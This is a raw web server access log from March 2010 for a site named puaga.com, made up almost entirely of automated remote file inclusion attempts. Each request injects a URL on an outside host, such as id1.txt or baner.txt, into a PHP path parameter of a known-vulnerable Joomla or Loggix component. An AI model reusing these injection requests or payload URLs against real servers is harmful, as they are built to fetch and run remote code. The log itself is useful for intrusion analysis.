200.93.147.154 - - [07/Mar/2010:09:51:33 -0800] "GET /logs//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:37 -0800] "GET /logs/access_100130.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:09:51:37 -0800] "GET /logs/access_100213.log%20%20//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:39 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:39 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:41 -0800] "GET /logs/access_100225.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:49 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:49 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:49 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:09:51:52 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:53 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:09:51:54 -0800] "GET /logs/access_100210.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:51:55 -0800] "GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:51:56 -0800] "GET /logs//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:51:56 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:51:56 -0800] "GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:51:57 -0800] "GET /logs//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:51:57 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:09:51:57 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:09:51:57 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:51:59 -0800] "GET /logs/access_100130.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:09:51:59 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [07/Mar/2010:09:52:02 -0800] "GET /logs/access_100210.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:52:03 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:52:03 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:52:03 -0800] "GET /logs/access_100221.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:52:04 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:52:04 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:52:04 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:52:04 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.152.83 - - [07/Mar/2010:09:52:12 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:52:24 -0800] "GET //?_SERVER[DOCUMENT_ROOT=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:52:24 -0800] "GET /logs/access_100201.log%20%20///?_SERVER[DOCUMENT_ROOT=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:52:24 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
194.39.140.100 - - [07/Mar/2010:09:52:36 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.39.140.100 - - [07/Mar/2010:09:52:36 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.39.140.100 - - [07/Mar/2010:09:52:36 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:52:41 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:52:41 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:52:41 -0800] "GET /logs/access_100221.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:52:41 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [07/Mar/2010:09:52:41 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Mar/2010:09:52:41 -0800] "GET /logs/access_100131.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:52:42 -0800] "GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [07/Mar/2010:09:52:43 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:52:49 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:09:52:49 -0800] "GET /logs/access_100225.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:09:52:49 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:09:52:49 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
194.39.140.100 - - [07/Mar/2010:09:52:50 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:52:56 -0800] "GET /logs//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:11 -0800] "GET /logs/access_100221.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:11 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:11 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:11 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:53:13 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:53:14 -0800] "GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:14 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:14 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:14 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:53:15 -0800] "GET /logs//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:53:33 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:53:34 -0800] "GET /include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:53:34 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:53:36 -0800] "GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:53:37 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:53:37 -0800] "GET /logs//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:40 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:40 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:40 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [07/Mar/2010:09:53:42 -0800] "GET /myevent.php?myevent_path=http://refurbishedpets.com/store/templates/rt_colormatic/css/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [07/Mar/2010:09:53:42 -0800] "GET /logs/access_100129.log%20%20/myevent.php?myevent_path=http://refurbishedpets.com/store/templates/rt_colormatic/css/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.250.93.56 - - [07/Mar/2010:09:53:42 -0800] "GET /logs/myevent.php?myevent_path=http://refurbishedpets.com/store/templates/rt_colormatic/css/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:44 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:44 -0800] "GET /logs/access_100224.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:44 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:09:53:48 -0800] "GET /logs/access_100224.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:53:49 -0800] "GET /logs/access_100225.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:53:58 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:53:58 -0800] "GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:53:58 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:53:58 -0800] "GET /logs//lib/Loggix/Module/Rss.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:00 -0800] "GET /logs//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:00 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:00 -0800] "GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:00 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Comment.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:05 -0800] "GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:05 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:05 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:05 -0800] "GET /logs//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:54:05 -0800] "GET /logs/access_100130.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:54:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:54:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:09:54:06 -0800] "GET /logs/access_100227.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:54:11 -0800] "GET /logs//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:54:13 -0800] "GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:13 -0800] "GET /logs//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:14 -0800] "GET /logs/access_100218.log%20%20//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:14 -0800] "GET /modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:14 -0800] "GET /logs/access_100213.log%20%20//modules/downloads/lib/LM_Downloads.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:09:54:15 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Trackback.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:20 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:20 -0800] "GET /include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:20 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:21 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:21 -0800] "GET /logs/access_100218.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:22 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.47.237.17 - - [07/Mar/2010:09:54:22 -0800] "GET /logs/access_100213.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:54:22 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:54:22 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:54:22 -0800] "GET /logs/access_100224.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [07/Mar/2010:09:54:24 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://section3.ps-lyon.fr/help/css/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
